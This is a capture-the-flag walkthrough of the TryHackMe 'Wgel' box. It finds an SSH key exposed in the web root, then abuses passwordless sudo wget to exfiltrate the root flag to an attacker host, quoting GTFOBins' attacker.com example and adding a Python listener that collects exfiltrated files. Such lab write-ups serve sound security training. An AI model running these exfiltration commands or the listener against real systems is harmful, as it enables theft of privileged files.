THM - Wgel
Introduction
Can you exfiltrate the root flag?
Dunno, but since this is an easy-rated box I give myself a fighting chance. Let's begin.
Ports
nmap says we’ve got 22 (SSH) and 80 (HTTP) only.
Webserver
The homepage is just the Apache default page, with one exception: a comment in the page source addressed to Jessie. So perhaps that's our username.
Gobuster is a place to start:
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196 -w /usr/share/wordlists/dirb/common.txt
This turns up one interesting directory, sitemap. Checking it we get a whole host of pages, basically an incomplete blog/business site built on a template called unapp. That turns up nothing on searchsploit, so let's gobuster the sitemap directory too:
root@kali:/opt/tryhackme/wgel# gobuster dir -u http://10.10.34.196/sitemap -w /usr/share/wordlists/dirb/common.txt
Doing that, we find .ssh/id_rsa sitting in the web root: a private SSH key served over plain HTTP to anyone who asks. Bingo.
Jessie
Once we've downloaded the SSH key, we chmod 600 it (ssh refuses to use a key with looser permissions) and log in:
root@kali:/opt/tryhackme/wgel# ssh -i id_rsa jessie@10.10.34.196
Then we run sudo -l:
jessie@CorpOne:~$ sudo -l
Matching Defaults entries for jessie on CorpOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget
Wget
Jessie has got the user flag, and the sudo rules let us run wget as root with no password. (The first rule, (ALL : ALL) ALL, would need Jessie's password, which we don't have; we logged in with her key.) What can we do with root wget? Well, the box hint was about exfiltrating the root flag.
GTFOBins says we can exfiltrate files:
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use --post-data to send hard-coded data.
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL
So let’s try that:
jessie@CorpOne:/$ URL=http://10.9.10.123:1234/
jessie@CorpOne:/$ LFILE=/root/root_flag.txt
jessie@CorpOne:/$ sudo wget --post-file=$LFILE $URL
--2020-08-07 07:02:51-- http://10.9.10.123:1234/
Connecting to 10.9.10.123:1234... connected.
On the receiving end I used netcat:
root@kali:/opt/tryhackme/wgel# nc -nvlp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.34.196.
Ncat: Connection from 10.10.34.196:45494.
POST / HTTP/1.1
User-Agent: Wget/1.17.1 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 10.9.10.123:1234
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
b1b968b37519ad1daa6408188649263d
Nice.
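Netcat was enough here because the loot is one short line of text: the Content-Length of 33 is the 32-character flag plus its trailing newline. For anything larger, or binary, you want a listener that honours Content-Length, writes the body to disk byte-for-byte and does no URL-decoding (wget labels the body application/x-www-form-urlencoded but sends the file unchanged, as the GTFOBins note warns). The listener below is an added example written for this write-up, not part of the original room or of GTFOBins; the loot/ output directory, the file-naming scheme and the default port of 1234 are my own choices.

```python
#!/usr/bin/env python3
"""Listener for `sudo wget --post-file=<file> http://<attacker>:<port>/`.

Added example (not from the original write-up or GTFOBins). Stores each
POST body exactly as received: wget labels the body
application/x-www-form-urlencoded but sends the file bytes unchanged,
so the receiver must not URL-decode anything.
"""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path

OUT_DIR = Path("loot")  # assumption: where received files are written


def parse_post(raw: bytes):
    """Split one raw HTTP request into (headers, body).

    The body is delimited by Content-Length only; everything after the
    first blank line is returned byte-for-byte, so binary bodies (even
    ones containing CRLF CRLF) and '%'-sequences survive intact.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: header block not terminated")
    request_line, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    length = int(headers.get("content-length", "0"))
    if len(rest) < length:
        raise ValueError(f"short body: {len(rest)} of {length} bytes")
    return headers, rest[:length]


def save_body(body: bytes, peer: str, counter: int, out_dir=OUT_DIR) -> Path:
    """Write body to out_dir/<peer>-<counter>.bin and return the path."""
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    dest = out_dir / f"{peer.replace(':', '_')}-{counter}.bin"
    dest.write_bytes(body)
    return dest


class ExfilHandler(BaseHTTPRequestHandler):
    counter = 0

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)  # raw bytes, nothing decoded
        ExfilHandler.counter += 1
        dest = save_body(body, self.client_address[0], ExfilHandler.counter)
        print(f"[+] {length} bytes from {self.client_address[0]} -> {dest}")
        # Answer so wget exits cleanly instead of waiting on Keep-Alive.
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # silence the default access log
        pass


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 1234
    print(f"[*] listening on 0.0.0.0:{port}, writing to {OUT_DIR}/")
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Run it as `python3 exfil_listener.py 1234` in place of the nc command, then fire the same sudo wget line from Jessie's shell. Because the handler sends a 200 back, wget returns immediately rather than sitting on "connected." as it does against netcat, and the file lands in loot/ with its bytes untouched; parse_post is exposed separately so the same logic can be replayed over a raw capture.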